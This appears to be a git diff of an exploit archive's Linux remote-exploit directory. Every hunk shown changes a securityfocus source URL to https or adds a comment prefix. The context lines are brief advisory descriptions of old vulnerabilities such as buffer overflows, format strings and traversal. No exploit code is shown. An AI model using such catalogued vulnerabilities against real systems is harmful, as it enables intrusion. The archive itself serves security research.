6b1c0222e..8ff47ed74 100755 --- a/exploits/linux/remote/22278.pl +++ b/exploits/linux/remote/22278.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6921/info +source: https://www.securityfocus.com/bid/6921/info A buffer overflow vulnerability has been reported for moxftp. The vulnerability occurs when moxftp is parsing 'Welcome' banner messages from remote FTP servers. When moxftp receives an overly long FTP banner, it will trigger the overflow condition. diff --git a/exploits/linux/remote/22291.c b/exploits/linux/remote/22291.c index bf2a868ee..db90d723a 100644 --- a/exploits/linux/remote/22291.c +++ b/exploits/linux/remote/22291.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6968/info +// source: https://www.securityfocus.com/bid/6968/info A format string vulnerability has been discovered AMX Mod 0.9.2 and earlier which may be exploitable to execute arbitrary code on a target Half-Life server. The problem occurs when calling the 'amx_say' command. By passing specially constructed format specifiers as an argument to the command, it is possible to modify arbitrary locations in memory. diff --git a/exploits/linux/remote/22342.c b/exploits/linux/remote/22342.c index 7b26cfd4c..5f437fdb2 100644 --- a/exploits/linux/remote/22342.c +++ b/exploits/linux/remote/22342.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7058/info +// source: https://www.securityfocus.com/bid/7058/info A memory corruption vulnerability has been discovered in Qpopper version 4.0.4 and earlier. diff --git a/exploits/linux/remote/22346.c b/exploits/linux/remote/22346.c index 8e18ef771..0eecc9952 100644 --- a/exploits/linux/remote/22346.c +++ b/exploits/linux/remote/22346.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7071/info +// source: https://www.securityfocus.com/bid/7071/info A vulnerability has been discovered in PGP4Pine. The problem occurs when parsing an email message for PGP data. Due to insufficient bounds checking, when processing lines of excessive length, a buffer may be overrun. This would result in sensitive locations in memory being overwritten with data supplied in the message. diff --git a/exploits/linux/remote/22353.c b/exploits/linux/remote/22353.c index dc410dcbb..c0cc665ef 100644 --- a/exploits/linux/remote/22353.c +++ b/exploits/linux/remote/22353.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7097/info +// source: https://www.securityfocus.com/bid/7097/info A memory corruption vulnerability has been discovered in BitchX 1.0c19. This issue occurs when handling server-supplied data and may cause characters to be written to sensitive stack memory. As a result, it may be possible for a malicious IRC server to execute arbitrary commands on a vulnerable client. diff --git a/exploits/linux/remote/22361.cpp b/exploits/linux/remote/22361.cpp index 7092725cb..11765b9a4 100644 --- a/exploits/linux/remote/22361.cpp +++ b/exploits/linux/remote/22361.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7110/info +source: https://www.securityfocus.com/bid/7110/info An information disclosure weakness has been reported for Qpopper when authenticating. The weakness is due to the fact that if a valid username is sent with a bad password, Qpopper will wait a small amount of time prior to disconnecting the client. If the username that is sent is invalid, Qpopper immediately disconnects the client. diff --git a/exploits/linux/remote/22369.txt b/exploits/linux/remote/22369.txt index adef72229..6de1d74f5 100644 --- a/exploits/linux/remote/22369.txt +++ b/exploits/linux/remote/22369.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7117/info +source: https://www.securityfocus.com/bid/7117/info The Evolution mail client supports "uuencoded" content and decodes it automatically when a message is initially parsed. A memory corruption error is present in the parsing component that can result in the client crashing when specially malformed content is decoded. The presence of such a message in an Evolution user's mailbox may result in a prolonged denial of service as the crashing of the GUI may prevent deletion of the message. The user will also not be able to read messages while the message is present in their mailbox. It is not yet determined whether this vulnerability may be exploited by remote attackers to compromise client hosts. Users are advised to upgrade despite this uncertainty. diff --git a/exploits/linux/remote/22371.txt b/exploits/linux/remote/22371.txt index bfb1c1b21..19b192ca4 100644 --- a/exploits/linux/remote/22371.txt +++ b/exploits/linux/remote/22371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7119/info +source: https://www.securityfocus.com/bid/7119/info Ximian Evolution does not properly validate MIME image/* Content-Type fields. If an email message contains an image/* Content-Type, any type of data can be embedded where the image information is expected. This can be used to embed HTML tags that will be rendered by GTKHtml, bypass policies, or invoke bonobo components to handle external content types. diff --git a/exploits/linux/remote/22379.c b/exploits/linux/remote/22379.c index daceb0282..977a5365c 100644 --- a/exploits/linux/remote/22379.c +++ b/exploits/linux/remote/22379.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7129/info +// source: https://www.securityfocus.com/bid/7129/info A vulnerability has been discovered in PXE which is included with Red Hat Linux. Specifically, it is possible for a remote attacker to overrun a buffer by passing excessive data to the service. This may result in the corruption of sensitive process memory, and as such may allow an attacker to execute arbitrary commands. diff --git a/exploits/linux/remote/22454.c b/exploits/linux/remote/22454.c index d7ca3d524..bb53db8a4 100644 --- a/exploits/linux/remote/22454.c +++ b/exploits/linux/remote/22454.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7268/info +// source: https://www.securityfocus.com/bid/7268/info It has been reported that a boundary condition error exists in WebC. Because of this, it may be possible for a remote attacker to gain unauthorized access to a vulnerable host. diff --git a/exploits/linux/remote/22479.c b/exploits/linux/remote/22479.c index 89624dfcd..a8d4211a1 100644 --- a/exploits/linux/remote/22479.c +++ b/exploits/linux/remote/22479.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7316/info +// source: https://www.securityfocus.com/bid/7316/info A buffer-overflow vulnerability has been discovered in PoPToP PPTP. The problem occurs because the software fails to do sufficient sanity checks when referencing user-supplied input used in various calculations. As a result, an attacker may be able to trigger a condition that would corrupt sensitive memory. diff --git a/exploits/linux/remote/22485.c b/exploits/linux/remote/22485.c index f52f86fff..501d2733d 100644 --- a/exploits/linux/remote/22485.c +++ b/exploits/linux/remote/22485.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7336/info +// source: https://www.securityfocus.com/bid/7336/info A vulnerability has been discovered in SheerDNS. Due to insufficient sanitization of DNS requests, an attacker may be able to view the contents of an arbitrary system directory or file. Information obtained by exploiting this issue may aid an attacker in launching further attacks against a target system. diff --git a/exploits/linux/remote/22584.txt b/exploits/linux/remote/22584.txt index 50d3e1514..45d5db50a 100644 --- a/exploits/linux/remote/22584.txt +++ b/exploits/linux/remote/22584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7550/info +source: https://www.securityfocus.com/bid/7550/info Info-ZIP UnZip contains a vulnerability during the handling of pathnames for archived files. Specifically, when certain encoded characters are inserted into '../' directory traversal sequences, the creator of the archive can cause the file to be extracted to arbitrary locations on the filesystem - including paths containing system binaries and other sensitive or confidential information. diff --git a/exploits/linux/remote/22601.txt b/exploits/linux/remote/22601.txt index 61b78440d..cf4e67fea 100644 --- a/exploits/linux/remote/22601.txt +++ b/exploits/linux/remote/22601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7596/info +source: https://www.securityfocus.com/bid/7596/info Inktomi Traffic Server is prone to a cross-site scripting vulnerability. This is due to insufficient sanitization of input passed to the proxy, which will be echoed back in error pages under some circumstances. A malicious attacker could exploit this issue by creating a link which contains hostile HTML and script code and then enticing users of the proxy to visit the link. When the link is visited via the proxy, attacker-supplied script may be interpreted in the user's browser. 
diff --git a/exploits/linux/remote/22622.txt b/exploits/linux/remote/22622.txt index 6cb3784e6..c65e369d2 100644 --- a/exploits/linux/remote/22622.txt +++ b/exploits/linux/remote/22622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7642/info +source: https://www.securityfocus.com/bid/7642/info A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP GET requests. As a result, an attacker may be capable of accessing the contents of sensitive system resources. Information obtained through the exploitation of this issue may aid an attacker in launching further attacks against a target system. diff --git a/exploits/linux/remote/22623.txt b/exploits/linux/remote/22623.txt index bfa5194a1..ba6b38a2a 100644 --- a/exploits/linux/remote/22623.txt +++ b/exploits/linux/remote/22623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7645/info +source: https://www.securityfocus.com/bid/7645/info A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP POST requests. As a result, an attacker may be capable of executing arbitrary files on a target system. This may lead to the complete compromise of a target system. diff --git a/exploits/linux/remote/22658.pl b/exploits/linux/remote/22658.pl index 5a77bcb61..f18af07bb 100755 --- a/exploits/linux/remote/22658.pl +++ b/exploits/linux/remote/22658.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7699/info +source: https://www.securityfocus.com/bid/7699/info Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. diff --git a/exploits/linux/remote/22659.c b/exploits/linux/remote/22659.c index f44ecc3d3..f4dd6af3d 100644 --- a/exploits/linux/remote/22659.c +++ b/exploits/linux/remote/22659.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7699/info +// source: https://www.securityfocus.com/bid/7699/info Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. diff --git a/exploits/linux/remote/2274.c b/exploits/linux/remote/2274.c index 2c87a9f40..a7aaaa20f 100644 --- a/exploits/linux/remote/2274.c +++ b/exploits/linux/remote/2274.c @@ -23,7 +23,7 @@ ___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ [i] Title: Streamripper HTTP Header Parsing Buffer Overflow Exploit [i] Discovered by: Ulf Harnhammar [i] Exploit by: Expanders -[i] References: http://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ +[i] References: https://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ [i] Greatings: x0n3-h4ck - netbunny - my girlfriend..thanks for existing [ Why streamripper crash? ] diff --git a/exploits/linux/remote/22771.txt b/exploits/linux/remote/22771.txt index 273d51a81..4df85a7c0 100644 --- a/exploits/linux/remote/22771.txt +++ b/exploits/linux/remote/22771.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7912/info +source: https://www.securityfocus.com/bid/7912/info A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request. diff --git a/exploits/linux/remote/22786.c b/exploits/linux/remote/22786.c index 5855109ab..7a2d108c1 100644 --- a/exploits/linux/remote/22786.c +++ b/exploits/linux/remote/22786.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7945/info +// source: https://www.securityfocus.com/bid/7945/info It has been reported that Dune is vulnerable to a remote boundary condition error when handling long requests. This could allow a remote attacker to execute arbitrary code on a vulnerable system. diff --git a/exploits/linux/remote/22830.c b/exploits/linux/remote/22830.c index f1e927b63..ffdc0136b 100644 --- a/exploits/linux/remote/22830.c +++ b/exploits/linux/remote/22830.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8021/info +source: https://www.securityfocus.com/bid/8021/info It has been reported that lbreakout2 is vulnerable to a format string issue in the login component. This may result in an attacker executing arbitrary code on a vulnerable host. */ diff --git a/exploits/linux/remote/22848.c b/exploits/linux/remote/22848.c index 422a4b000..56f7e2513 100644 --- a/exploits/linux/remote/22848.c +++ b/exploits/linux/remote/22848.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8071/info +// source: https://www.securityfocus.com/bid/8071/info It has been reported that ezbounce is affected by a format string vulnerability. The condition is present in the file "ezbounce/commands.cpp" and can be triggered when session support is enabled. To exploit this vulnerability, the attacker must have valid credentials. This flaw may be of use to attackers who have proxy access but no privileges on the underlying host. diff --git a/exploits/linux/remote/22873.c b/exploits/linux/remote/22873.c index 5116ff872..c73cebf6a 100644 --- a/exploits/linux/remote/22873.c +++ b/exploits/linux/remote/22873.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8118/info +// source: https://www.securityfocus.com/bid/8118/info It has been reported that the Mailwatch plugin for GKrellM is vulnerable to a remotely exploitable buffer overflow. This may permit the execution of arbitrary code with the privileges of the GKrellM program. 
diff --git a/exploits/linux/remote/22893.c b/exploits/linux/remote/22893.c index 7135bebec..6d8a1fea2 100644 --- a/exploits/linux/remote/22893.c +++ b/exploits/linux/remote/22893.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8167/info +// source: https://www.securityfocus.com/bid/8167/info It has been reported that the FTP gateway component within the gopherd server is prone to a buffer overflow vulnerability. This vulnerability may be present due to a failure to perform bounds checking when processing long filenames returned from the FTP LIST command. This could permit code execution in the context of the software. diff --git a/exploits/linux/remote/22894.c b/exploits/linux/remote/22894.c index 3721220c2..584566e10 100644 --- a/exploits/linux/remote/22894.c +++ b/exploits/linux/remote/22894.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8168/info +// source: https://www.securityfocus.com/bid/8168/info It has been reported that there is a buffer overflow condition present in gopherd that may be exploited remotely to execute arbitrary code. The affected component is said to be used for determining view-types for gopher objects. diff --git a/exploits/linux/remote/22908.c b/exploits/linux/remote/22908.c index f77423e42..5231cdb64 100644 --- a/exploits/linux/remote/22908.c +++ b/exploits/linux/remote/22908.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8194/info +// source: https://www.securityfocus.com/bid/8194/info The Exceed server and client have been reported prone to a remotely triggered buffer overflow vulnerability. An attacker may trigger this vulnerability by sending excessive data as a font name to the server via a malicios XLoadQueryFont() request, or by passing a malicious font name from the server to the client in a manner sufficient to trigger the overflow. When the vulnerable software handles this request it will crash. 
diff --git a/exploits/linux/remote/22968.c b/exploits/linux/remote/22968.c index 4fc5ddee3..383922a19 100644 --- a/exploits/linux/remote/22968.c +++ b/exploits/linux/remote/22968.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/8300/info +// source: https://www.securityfocus.com/bid/8300/info // Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-//check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. diff --git a/exploits/linux/remote/22969.c b/exploits/linux/remote/22969.c index fcc6e135a..a9ed6ffd9 100644 --- a/exploits/linux/remote/22969.c +++ b/exploits/linux/remote/22969.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/8300/info +// source: https://www.securityfocus.com/bid/8300/info // Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. diff --git a/exploits/linux/remote/23049.c b/exploits/linux/remote/23049.c index e987764a9..cbd2573da 100644 --- a/exploits/linux/remote/23049.c +++ b/exploits/linux/remote/23049.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8467/info +// source: https://www.securityfocus.com/bid/8467/info Several stack-based buffer overflow vulnerabilities exist in multiple srcpd commands that may allow an attacker to run arbitrary code on a vulnerable host. The vulnerability is due to the lack of boundary checking in the affected functions, leading to stack overflow conditions. diff --git a/exploits/linux/remote/23054.txt b/exploits/linux/remote/23054.txt index a0d301540..e5d0346d9 100644 
--- a/exploits/linux/remote/23054.txt +++ b/exploits/linux/remote/23054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8479/info +source: https://www.securityfocus.com/bid/8479/info WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised. diff --git a/exploits/linux/remote/23115.c b/exploits/linux/remote/23115.c index c38c94d17..52d4bce8c 100644 --- a/exploits/linux/remote/23115.c +++ b/exploits/linux/remote/23115.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8557/info +// source: https://www.securityfocus.com/bid/8557/info A remote buffer overflow vulnerability when calling the sscanf() function has been reported to affect the mah-jong game client and server programs. The issue occurs within seperate source files, however the code used by both programs is identical. It should be noted that the bug must be triggered using different options depending on whether the target is a client or server. diff --git a/exploits/linux/remote/23151.c b/exploits/linux/remote/23151.c index 2d972e007..a05897af8 100644 --- a/exploits/linux/remote/23151.c +++ b/exploits/linux/remote/23151.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8629/info +// source: https://www.securityfocus.com/bid/8629/info Liquid War has been reported prone to a buffer overflow condition when handling HOME environment variables of excessive length. diff --git a/exploits/linux/remote/23154.c b/exploits/linux/remote/23154.c index 87fc9aa71..c45de5972 100644 --- a/exploits/linux/remote/23154.c +++ b/exploits/linux/remote/23154.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8641/info +source: https://www.securityfocus.com/bid/8641/info Sendmail is prone to a buffer overrun vulnerability in the prescan() function. This issue is different than the vulnerability described in BID 7230. This vulnerability could permit remote attackers to execute arbitrary code via vulnerable versions of Sendmail. */ diff --git a/exploits/linux/remote/23161.c b/exploits/linux/remote/23161.c index 8cfd4f5d3..804440a9a 100644 --- a/exploits/linux/remote/23161.c +++ b/exploits/linux/remote/23161.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8655/info +// source: https://www.securityfocus.com/bid/8655/info lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. diff --git a/exploits/linux/remote/23162.c b/exploits/linux/remote/23162.c index 2e4fd77c2..795779ecb 100644 --- a/exploits/linux/remote/23162.c +++ b/exploits/linux/remote/23162.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8655/info +// source: https://www.securityfocus.com/bid/8655/info lsh has been reported prone to a remote buffer overflow vulnerability. The condition is reported to present itself in fairly restrictive circumstances, and has been reported to be exploitable pre-authentication. Successful exploitation could result in the execution of arbitrary attacker supplied instructions in the context of the affected daemon. diff --git a/exploits/linux/remote/23171.c b/exploits/linux/remote/23171.c index 85342e4ff..e3978aa50 100644 --- a/exploits/linux/remote/23171.c +++ b/exploits/linux/remote/23171.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8680/info +// source: https://www.securityfocus.com/bid/8680/info A problem in the handling of some types of remote files has been reported in mpg123. Because of this, it may be possible for a remote attacker to execute arbitrary code with the privileges of the mpg123 user. diff --git a/exploits/linux/remote/23182.c b/exploits/linux/remote/23182.c index e26f814cf..1791a1a75 100644 --- a/exploits/linux/remote/23182.c +++ b/exploits/linux/remote/23182.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8699/info +// source: https://www.securityfocus.com/bid/8699/info cfengine is prone to a stack-based buffer overrun vulnerability. This issue may be exploited by remote attackers who can send malicious transaction packets to cfservd. This issue is due to insufficient bounds checking of data that is read in during a transaction with a remote user. diff --git a/exploits/linux/remote/23183.c b/exploits/linux/remote/23183.c index e5c576343..81d33064b 100644 --- a/exploits/linux/remote/23183.c +++ b/exploits/linux/remote/23183.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8699/info +// source: https://www.securityfocus.com/bid/8699/info cfengine is prone to a stack-based buffer overrun vulnerability. This issue may be exploited by remote attackers who can send malicious transaction packets to cfservd. This issue is due to insufficient bounds checking of data that is read in during a transaction with a remote user. diff --git a/exploits/linux/remote/23186.txt b/exploits/linux/remote/23186.txt index 8c6929285..23e5c2ef5 100644 --- a/exploits/linux/remote/23186.txt +++ b/exploits/linux/remote/23186.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8702/info +source: https://www.securityfocus.com/bid/8702/info A vulnerability has been discovered in MPLayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible. diff --git a/exploits/linux/remote/23188.c b/exploits/linux/remote/23188.c index 2e16ab7f5..e7bd82eb7 100644 --- a/exploits/linux/remote/23188.c +++ b/exploits/linux/remote/23188.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8709/info +// source: https://www.securityfocus.com/bid/8709/info Athttpd is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution. diff --git a/exploits/linux/remote/23196.c b/exploits/linux/remote/23196.c index e350f92c5..e3e322531 100644 --- a/exploits/linux/remote/23196.c +++ b/exploits/linux/remote/23196.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8726/info +// source: https://www.securityfocus.com/bid/8726/info It has been discovered that WebFS is prone to a buffer overrun vulnerability when handling path names of excessive length. As a result, an attacker may be capable of triggering the condition and overwriting sensitive memory with malicious data. This could ultimately allow for the execution of arbitrary code with the privileges of the WebFS HTTP server. 
diff --git a/exploits/linux/remote/23295.txt b/exploits/linux/remote/23295.txt index 96c734432..bf9ccf8d4 100644 --- a/exploits/linux/remote/23295.txt +++ b/exploits/linux/remote/23295.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8897/info +source: https://www.securityfocus.com/bid/8897/info A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. diff --git a/exploits/linux/remote/23296.txt b/exploits/linux/remote/23296.txt index 56c10116b..20f58c1b0 100644 --- a/exploits/linux/remote/23296.txt +++ b/exploits/linux/remote/23296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8898/info +source: https://www.securityfocus.com/bid/8898/info The Red Hat Apache configuration may allow an attacker to view directory listings. The problem is reported to present itself when an attacker issues an HTTP GET request to a vulnerable server containing '//' characters, evading the rule desgined to prevent Apache from displaying directory listings with a request for '/'. The server is reported to disclose directory listings even when autoindex for the root directory has been disabled and a default welcome page is supposed to be displayed. diff --git a/exploits/linux/remote/23306.c b/exploits/linux/remote/23306.c index df0ec2d84..82ed0df77 100644 --- a/exploits/linux/remote/23306.c +++ b/exploits/linux/remote/23306.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8906/info +// source: https://www.securityfocus.com/bid/8906/info A vulnerability has been reported in thttpd that may allow a remote attacker to execute arbitrary code on vulnerable host. The issue is reported to exist due to a lack of bounds checking by software, leading to a buffer overflow condition. The problem is reported to exist in the defang() function in libhttpd.c. 
diff --git a/exploits/linux/remote/23366.c b/exploits/linux/remote/23366.c index f4ecd72fc..3943c82ef 100644 --- a/exploits/linux/remote/23366.c +++ b/exploits/linux/remote/23366.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8999/info +// source: https://www.securityfocus.com/bid/8999/info A remotely exploitable buffer overrun has been reported in Epic. This issue may reportedly be exploited by a malicious server that supplies an overly long nickname in a CTCP messages, potentially allowing for execution of arbitrary code in the context of the client user. It may be also be possible for a malicious client to send such a message, but it is likely that the server will limit the length. diff --git a/exploits/linux/remote/23368.c b/exploits/linux/remote/23368.c index 2bb193396..5b5e9db80 100644 --- a/exploits/linux/remote/23368.c +++ b/exploits/linux/remote/23368.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9002/info +// source: https://www.securityfocus.com/bid/9002/info UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce. diff --git a/exploits/linux/remote/23369.c b/exploits/linux/remote/23369.c index 193addce1..eecd4895a 100644 --- a/exploits/linux/remote/23369.c +++ b/exploits/linux/remote/23369.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9002/info +// source: https://www.securityfocus.com/bid/9002/info UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce. diff --git a/exploits/linux/remote/23371.c b/exploits/linux/remote/23371.c index 8635d84db..c5285e5cc 100644 --- a/exploits/linux/remote/23371.c +++ b/exploits/linux/remote/23371.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9005/info +// source: https://www.securityfocus.com/bid/9005/info Hylafax hfaxd (daemon) has been reported prone to an unspecified format string vulnerability that may be exploited under non-standard configurations to execute arbitrary instructions remotely as the root user. diff --git a/exploits/linux/remote/23397.pl b/exploits/linux/remote/23397.pl index bbca0f5d9..a65b03330 100755 --- a/exploits/linux/remote/23397.pl +++ b/exploits/linux/remote/23397.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9099/info +source: https://www.securityfocus.com/bid/9099/info A buffer overrun vulnerability has been discovered in Monit 4.1 and earlier that could be exploited remotely to gain root privileges. The problem occurs due to insufficient bounds checking when handling overly long HTTP requests. As a result, it may be possible for a remote attacker to corrupt sensitive process data in such a way that the execution flow of Monit can be controlled. diff --git a/exploits/linux/remote/23413.c b/exploits/linux/remote/23413.c index 69a6421d8..c44ef5528 100644 
--- a/exploits/linux/remote/23413.c +++ b/exploits/linux/remote/23413.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9156/info +// source: https://www.securityfocus.com/bid/9156/info It has been reported that a buffer overflow condition is present in the authentication mechanism implemented in Ebola. The condition is due to the use of the C library function sprintf() to construct an error message when authentication is not successful. According to the discoverer of this flaw, the vulnerability is remotely exploitable. diff --git a/exploits/linux/remote/23441.c b/exploits/linux/remote/23441.c index 92ff1b265..956dfddbd 100644 --- a/exploits/linux/remote/23441.c +++ b/exploits/linux/remote/23441.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9227/info +// source: https://www.securityfocus.com/bid/9227/info A problem has been identified in the Cyrus IMSP Daemon implementation when handling certain types of requests. Because of this, it may be possible for a remote attacker to gain unauthorized access to a system using the vulnerable software. diff --git a/exploits/linux/remote/23585.txt b/exploits/linux/remote/23585.txt index d5f583eeb..ad21d5957 100644 --- a/exploits/linux/remote/23585.txt +++ b/exploits/linux/remote/23585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9478/info +source: https://www.securityfocus.com/bid/9478/info Finjan SurfinGate is prone to a vulnerability that may permit remote attackers to execute certain management commands (using the FHTTP protocol) through the management control port (3141/TCP). It has been reported that commands could be issued to restart the server, most likely resulting in a denial of service. diff --git a/exploits/linux/remote/23604.txt b/exploits/linux/remote/23604.txt index 9d0316f86..6848b86e5 100644 --- a/exploits/linux/remote/23604.txt +++ b/exploits/linux/remote/23604.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9495/info +source: https://www.securityfocus.com/bid/9495/info It has been reported that Antologic Antolinux may be prone to a remote command execution vulnerability that may allow an attacker to execute arbitrary commands with the privileges of the server hosting the vulnerable software. The issue exists due to insufficient sanitization of user-supplied input via the 'NDCR' parameter. An attacker may need to spoof the HTTP REFERER and the vulnerability may only be exploited if sudo is not enabled. diff --git a/exploits/linux/remote/23671.txt b/exploits/linux/remote/23671.txt index 7205287d4..a5db7e2c0 100644 --- a/exploits/linux/remote/23671.txt +++ b/exploits/linux/remote/23671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9617/info +source: https://www.securityfocus.com/bid/9617/info It has been reported that Resin may be prone to an information disclosure vulnerability that may allow an attacker to disclose directory listings by passing malicious data via a URI parameter. diff --git a/exploits/linux/remote/23728.txt b/exploits/linux/remote/23728.txt index 79c96d2c6..d132f277e 100644 --- a/exploits/linux/remote/23728.txt +++ b/exploits/linux/remote/23728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9692/info +source: https://www.securityfocus.com/bid/9692/info Metamail has been reported prone to multiple vulnerabilities that may provide for arbitrary code execution. Two buffer overflow vulnerabilities have been reported to affect Metamail. Additionally, two format string-handling vulnerabilities have been reported. These issues may also be exploited by a remote attacker to execute arbitrary code. diff --git a/exploits/linux/remote/23740.c b/exploits/linux/remote/23740.c index 828cd510e..e9ea82d64 100644 --- a/exploits/linux/remote/23740.c +++ b/exploits/linux/remote/23740.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/9715/info +source: https://www.securityfocus.com/bid/9715/info hsftp has been found to be prone to a remote print format string vulnerability. This issue is due to the application improper use of a format printing function. diff --git a/exploits/linux/remote/23771.pl b/exploits/linux/remote/23771.pl index c62d3116f..f812dcc96 100755 --- a/exploits/linux/remote/23771.pl +++ b/exploits/linux/remote/23771.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9772/info +source: https://www.securityfocus.com/bid/9772/info GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'. diff --git a/exploits/linux/remote/23772.c b/exploits/linux/remote/23772.c index e64c9daaf..e9b714f02 100644 --- a/exploits/linux/remote/23772.c +++ b/exploits/linux/remote/23772.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9772/info +// source: https://www.securityfocus.com/bid/9772/info GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been 